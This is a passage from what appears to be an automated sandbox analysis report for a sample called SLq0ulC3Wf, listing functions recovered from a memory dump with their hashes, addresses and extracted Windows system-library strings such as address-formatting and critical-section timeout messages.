Instruction ID: 8ac0d7d99754cafcd714c2f0cb3de11a9441cb57fd7c1d173466406975f0566b
Opcode Fuzzy Hash: eb61f44895182cc3a6570ee9812658f1e9e1b2fc7fca155bee383e4dae589be6
Instruction Fuzzy Hash: AD900437351400030105F55C07045071047D7D73D1757C031F1015550CD735CD715331

Function 01A02DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a449cf81e05c70e96f5af655ed2d3ac03c3125e63942fd46b27be8c27bca795
Instruction ID: f75557a43c5a2d002eb99f3932c69ea744233197c77d0ab437034ea51b81a5c1
Opcode Fuzzy Hash: 2a449cf81e05c70e96f5af655ed2d3ac03c3125e63942fd46b27be8c27bca795
Instruction Fuzzy Hash: AE90023228140403D141715844046061009A7D1281F96C012A0424554EC7598B56AB61

Function 01A02DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6933c35fcc2d6138308ad4e6220d6f8e262dc40cfd4bfb9332cbb03dcd84bab4
Instruction ID: d99e4d556c6a9cdc856b84c28b455678babd248c23eb017ecb910e8c47697bf5
Opcode Fuzzy Hash: 6933c35fcc2d6138308ad4e6220d6f8e262dc40cfd4bfb9332cbb03dcd84bab4
Instruction Fuzzy Hash: B9900222282441535545B15844045075006A7E1281B96C012A1414950CC62A9956D721

Function 01A02D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b762132bb39d6aaea8c59410aab18768774084bf0ccc3506296f0864cb351ef0
Instruction ID: 170774d2fdab3f11ef6338a47f6a207c798833e9629073896544c5897c613966
Opcode Fuzzy Hash: b762132bb39d6aaea8c59410aab18768774084bf0ccc3506296f0864cb351ef0
Instruction Fuzzy Hash: B890022234140003D140715854186065005E7E2341F56D011E0414554CDA1989565322

Function 01A02D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21820ba914597471561cb577fab7c98037ae0d0fdc994eaba93b8d86438146d
Instruction ID: c34ee3ac1dae34c26e5db54f20defcbc5d355b7cf9f59b6f49923d7c9bea2e87
Opcode Fuzzy Hash: b21820ba914597471561cb577fab7c98037ae0d0fdc994eaba93b8d86438146d
Instruction Fuzzy Hash: 7D90022224544443D10075585408A06100597D1245F56D011A1064595DC7398951A231

Function 01A02D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd56c033d197f694ee9b6d62e9766a21f89cfdddc1f1239826d3c40748cf032f
Instruction ID: d525fc487d69fb43ae231e02890b6c07c6b4a8c247019a13064747e8575de5e9
Opcode Fuzzy Hash: cd56c033d197f694ee9b6d62e9766a21f89cfdddc1f1239826d3c40748cf032f
Instruction Fuzzy Hash: 8890022A25340003D1807158540860A100597D2242F96D415A0015558CCA1989695321

Function 01A02CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5028a23d37adae24192d6fef8d84b7c5e531e6c4fec66158655efaa94f82d65e
Instruction ID: 0b1a728b53161a0bfb8c1501ec84c94b14e8c3bdabae776d1632b5ce5983dd05
Opcode Fuzzy Hash: 5028a23d37adae24192d6fef8d84b7c5e531e6c4fec66158655efaa94f82d65e
Instruction Fuzzy Hash: C290023224140403D10075985408646100597E1341F56D011A5024555EC76989916231

Function 01A02CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be323a738257702fc2e00b4f19298536803a2823584f43f0526bbb74b3fd2fda
Instruction ID: fba860630d9f5793ee7a3d1502b4a57780638f9e8494474f16c7d325484df5de
Opcode Fuzzy Hash: be323a738257702fc2e00b4f19298536803a2823584f43f0526bbb74b3fd2fda
Instruction Fuzzy Hash: C590043334140403D100715C550C7071005D7D1341F57D411F043455CDD75FCD517331

Function 01A02CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc17de04463eb38cebb15e8d120f419b4ee805e904d2dda59f36c87a3c22db89
Instruction ID: 9b1b9c8c4443fb5f7444df9518223fd280187523006a64cbff8827583588efe7
Opcode Fuzzy Hash: dc17de04463eb38cebb15e8d120f419b4ee805e904d2dda59f36c87a3c22db89
Instruction Fuzzy Hash: AA90043374540403D140715C541C7071015D7D1341F57D011F0034554DC75DCF5577F1

Function 01A02C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7049f4b42f6c11601a4e0226ef86d8ce9c90bd5c1e133ebca44b671cba7bbfe1
Instruction ID: 97b6e7111af2c9dbe8f7a910e5c05cf13c01d1f6e701ec7b53e9bc3afb013f94
Opcode Fuzzy Hash: 7049f4b42f6c11601a4e0226ef86d8ce9c90bd5c1e133ebca44b671cba7bbfe1
Instruction Fuzzy Hash: 9490023224140843D10071584404B46100597E1341F56C016A0124654DC719C9517621

Function 01A02FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5732211e86550902178cf25f196556b05f25434a5dc98bb60d12ae886f376b41
Instruction ID: 635f7fe818517e6be1c891b5c4bb7d97e39c42341fe9a2cfa895bcd7f7f1de65
Opcode Fuzzy Hash: 5732211e86550902178cf25f196556b05f25434a5dc98bb60d12ae886f376b41
Instruction Fuzzy Hash: 0390023224180403D10071584808747100597D1342F56C011A5164555EC769C9916631

Function 01A02FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209c201919550c0a3a632865500b5dffaecf8d9675b0e597bd7ea183ae9a0e9c
Instruction ID: 40358e65688e7b5c5262e208c0e9f9744e0546413a04880f1e5e1b09f27b82bc
Opcode Fuzzy Hash: 209c201919550c0a3a632865500b5dffaecf8d9675b0e597bd7ea183ae9a0e9c
Instruction Fuzzy Hash: 82900222641400434140716888449065005BBE2251B56C121A0998550DC65D89655765

Function 01A02F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6aec4aa50f52d456dd80422f37f402f951b67bf2af6274030c277fef28ee2c0
Instruction ID: 3eaa780ce4d1c5a520403ea5c58b05b1dc062c1101ca4021f7a0e7da6be5297b
Opcode Fuzzy Hash: a6aec4aa50f52d456dd80422f37f402f951b67bf2af6274030c277fef28ee2c0
Instruction Fuzzy Hash: 5690023224180403D1007158481470B100597D1342F56C011A1164555DC72989516671

Function 01A02FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b8e5e43ff5f7ac9c9c3e492c45aed33fabc3280f2f58ad9c0b1761427751da0
Instruction ID: 7819f59c16a8da4e790aaf55fb8d5e362794c213c1670085306a89517675a24c
Opcode Fuzzy Hash: 3b8e5e43ff5f7ac9c9c3e492c45aed33fabc3280f2f58ad9c0b1761427751da0
Instruction Fuzzy Hash: 13900222251C0043D20075684C14B07100597D1343F56C115A0154554CCA1989615621

Function 01A02F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec37fcddea95a76b165dcebebe7ac62dc971aa5ba70afa32dc6fce325617783
Instruction ID: 2d56d80b5f2d5232da9549e593bca5a99c5b8e0b7add4c4b8b40495e60cf59c6
Opcode Fuzzy Hash: 9ec37fcddea95a76b165dcebebe7ac62dc971aa5ba70afa32dc6fce325617783
Instruction Fuzzy Hash: 3B90026238140443D10071584414B061005D7E2341F56C015E1064554DC71DCD526226

Function 01A02F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4c51e9113474794093fecef02e687ce4e9ea40c6cc3125f2db14e4d1c24940
Instruction ID: 56023c8db798a4ef9ede6af732989e780d5b3688fa80c8203d18e4a3e9460dcc
Opcode Fuzzy Hash: 3b4c51e9113474794093fecef02e687ce4e9ea40c6cc3125f2db14e4d1c24940
Instruction Fuzzy Hash: 4C90026225140043D10471584404706104597E2241F56C012A2154554CC62D8D615225

Function 01A02EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c789cc566025eecb13eccac60349e6b997c1ab03bd8b38936f559e09f3a195
Instruction ID: 00c254e5cfcbff604aaa89af8484f0707324fac0d1aa55296534d2e69258432c
Opcode Fuzzy Hash: c0c789cc566025eecb13eccac60349e6b997c1ab03bd8b38936f559e09f3a195
Instruction Fuzzy Hash: 5390047334140403D140715C44047471005D7D1341F57C011F5074554FC75DCFD57775

Function 01A02E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65316ee45700eaa14a60c687ecdef49b74a486530fd276ad9ec4f255ac4da6c0
Instruction ID: 18888cc4c451fd890fe7a304c225e3b5cc58d5f5b300dcef7cc691257f269e79
Opcode Fuzzy Hash: 65316ee45700eaa14a60c687ecdef49b74a486530fd276ad9ec4f255ac4da6c0
Instruction Fuzzy Hash: 9490022264140503D10171584404616100A97D1281F96C022A1024555ECB298A92A231

Function 01A02EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b5c6b2344a3599a1cc2d3e6e2135c6ee7ae7ae552a8c2edd08358418f1603b
Instruction ID: 7b45f876e3767bcdd980c0a44746d7590adfe92e5959521fca1886e48832c000
Opcode Fuzzy Hash: 94b5c6b2344a3599a1cc2d3e6e2135c6ee7ae7ae552a8c2edd08358418f1603b
Instruction Fuzzy Hash: 2B90026224180403D14075584804607100597D1342F56C011A2064555ECB2D8D516235

Function 01A02E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1886aeb3327ce80eb2a9f2a93060fe3edcd6c7d58c1d7b3a59ac095f726fbc33
Instruction ID: 846590e0f2fc962c162de18efef2f06a8b3f3814b7c9751288d83973dced10b4
Opcode Fuzzy Hash: 1886aeb3327ce80eb2a9f2a93060fe3edcd6c7d58c1d7b3a59ac095f726fbc33
Instruction Fuzzy Hash: 5590022234140403D102715844146061009D7D2385F96C012E1424555DC7298A53A232

Function 01A03090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aae4a414afcc2bfd45bcb39aa15e7a96121c69e7db3ef72ce1a071a1ed0dfb2
Instruction ID: 70b17d49062cbf266e99895ec66fe7102b7a9b1083e090375c6850e08da888f9
Opcode Fuzzy Hash: 2aae4a414afcc2bfd45bcb39aa15e7a96121c69e7db3ef72ce1a071a1ed0dfb2
Instruction Fuzzy Hash: 5C90022228140803D140715884147071006D7D1641F56C011A0024554DC71A8A6567B1

Function 01A03010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552a15956e6edf140d1e7036875c47855e33a93372fbe0707043c4b86c01c229
Instruction ID: e48f8a44f119dc5fb37d7f82f653ac3b85e6ae180d8c4b8a1b1ca36065a20ca9
Opcode Fuzzy Hash: 552a15956e6edf140d1e7036875c47855e33a93372fbe0707043c4b86c01c229
Instruction Fuzzy Hash: 0F90022224184443D14072584804B0F510597E2242F96C019A4156554CCA1989555721

Function 01A039B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872dc99289867f4e2aa785755a35802f396d02b9639fefbdb8be157e413b66d3
Instruction ID: c9ed6cda0e04fd6794def4874f1bcb457587acb7718aa3155431c961f61c45a4
Opcode Fuzzy Hash: 872dc99289867f4e2aa785755a35802f396d02b9639fefbdb8be157e413b66d3
Instruction Fuzzy Hash: A190022228545103D150715C44046165005B7E1241F56C021A0814594DC65989556321

Function 01A03D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de4b6c3f286bd8360265c783afed44010775165fd88c508a964d8bc5e85d128
Instruction ID: 1e178dda137b0e2af6909a979321e324cf9d7ca17633fa61a22ee22715e95e36
Opcode Fuzzy Hash: 9de4b6c3f286bd8360265c783afed44010775165fd88c508a964d8bc5e85d128
Instruction Fuzzy Hash: 5890023224240143954072585804A4E510597E2342F96D415A0015554CCA1889615321

Function 01A03D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523bddc5c6307845f045dd98302735a002ff55e9865dd4d6f4a53048ee55bb45
Instruction ID: 7eced7b90e06c77cf750e287a964ed6d5252b6ef29d6ed26d1dfbbed68d7b675
Opcode Fuzzy Hash: 523bddc5c6307845f045dd98302735a002ff55e9865dd4d6f4a53048ee55bb45
Instruction Fuzzy Hash: C090023624140403D51071585804646104697D1341F56D411A0424558DC75889A1A221

Function 01A02C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 52e978578e077edba0831d1192d802e0eff8b2011b161982e00cd0f8527f42b5
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01A02890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A0293C
___swprintf_l.LIBCMT ref: 01A0295E
___swprintf_l.LIBCMT ref: 01A029A3
___swprintf_l.LIBCMT ref: 01A3A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 01A3A527
:%u.%u.%u.%u, xrefs: 01A3A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 01A3A54E
ffff:, xrefs: 01A3A504

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 59568194e0aa467bedf9f8c085c84946031e970dc8db4739e9fe55eeb872c3f4
Instruction ID: 46f654ec0581af69eb8125e9d5d5683bb325728fd9ac41ba0efa6c19fd121ee5
Opcode Fuzzy Hash: 59568194e0aa467bedf9f8c085c84946031e970dc8db4739e9fe55eeb872c3f4
Instruction Fuzzy Hash: 4F510AB5A00216BFDB13DBAC9984A7EFBB8BB48340714816AF599D3681D334DF4487E0

Function 01A72410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A724A6
___swprintf_l.LIBCMT ref: 01A724E2
___swprintf_l.LIBCMT ref: 01A7257D
___swprintf_l.LIBCMT ref: 01A725A3
___swprintf_l.LIBCMT ref: 01A725C8
___swprintf_l.LIBCMT ref: 01A72608

Strings

::%hs%u.%u.%u.%u, xrefs: 01A7249E
::ffff:0:%u.%u.%u.%u, xrefs: 01A724DA
ffff:, xrefs: 01A7247D, 01A7249D
:%u.%u.%u.%u, xrefs: 01A725FF

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1cdcc499049757b1ef0ccd69ed85ec5659d56189e92a955ed7655e8b3e39e5a2
Instruction ID: af0474d106ca58dac6a1d8a70a127a56087aaf9aaebfa7216e3258d065444d66
Opcode Fuzzy Hash: 1cdcc499049757b1ef0ccd69ed85ec5659d56189e92a955ed7655e8b3e39e5a2
Instruction Fuzzy Hash: 0351E775A00645AEDB30DF6CCD90A7FBBF9EB44200B04846BF59AD7642E674EB408760

Function 019F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A34742
ExecuteOptions, xrefs: 01A346A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A346FC
Execute=1, xrefs: 01A34713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01A34787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A34655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A34725

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
Instruction ID: 660ba29c23666c8fbbb86a3962f85e168db890a60ec2ace250fe59af2f838236
Opcode Fuzzy Hash: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
Instruction Fuzzy Hash: B25128316002197BEF25ABE8EC85FAA77BCAF58305F0400ADE709A71D1E7719A458F51

Function 01A0B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A0B6BF

Strings

0, xrefs: 01A0B695
-, xrefs: 01A0B650
+, xrefs: 01A0B65A
0, xrefs: 01A0B66F

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: c075bf17525724de2f2cf6854a49e987d4cc26c8aac243e0bc1016a04e5fdda9
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 2E81B138E062498EEF2BCF6CEA507BEBBB1AF45310F1C4559D851A72D1C73499408B71

Function 01A720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A7214F
___swprintf_l.LIBCMT ref: 01A72172

Strings

]:%u, xrefs: 01A72169
[, xrefs: 01A7212B
%%%u, xrefs: 01A72146

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
Instruction ID: 7d8d14bd58121c674941eb05248833b5c00fb2b0984de0c38ba8be1404775d3d
Opcode Fuzzy Hash: 9cfe01ffb38fbabb77c494c8185930d3f2f26b39d85c2b0cd300f5b51f90c7a9
Instruction Fuzzy Hash: 0121627AA00259ABDB11DF79ED40AFEBBF8FF54650F040126EA45E3241E730DA018BA1

Function 019EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A3031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A302E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A302BD

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
Instruction ID: bfd79673e99b809377f634e424c53fe81ec60ba13ac740b3f286ae6bb1bd8d07
Opcode Fuzzy Hash: 0fa60ad2411243e3af6d2cf1a099ea2e4836cc8c967c520d0ba5f95bb1adbde9
Instruction Fuzzy Hash: 0FE1C0306047419FE726CF28C988B2ABBE4BF88714F140A5EF5A9CB2E1D775D945CB42

Function 019FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01A37BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A37B7F
RTL: Resource at %p, xrefs: 01A37B8E

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
Instruction ID: efef770dc234e9771f9c56b044d9ad82039aa1fa306a45e1f439633180195512
Opcode Fuzzy Hash: 1aa4221b4b3c036f421474cd7d71083fab32978872408f04d2f2e87e912975f4
Instruction Fuzzy Hash: 0541EF35704702AFD725DE29C940F6AB7E5EF88721F000A1DFA5B9B680DB31E8058B91

Function 019FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A3728C

Strings

RTL: Re-Waiting, xrefs: 01A372C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A37294
RTL: Resource at %p, xrefs: 01A372A3

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
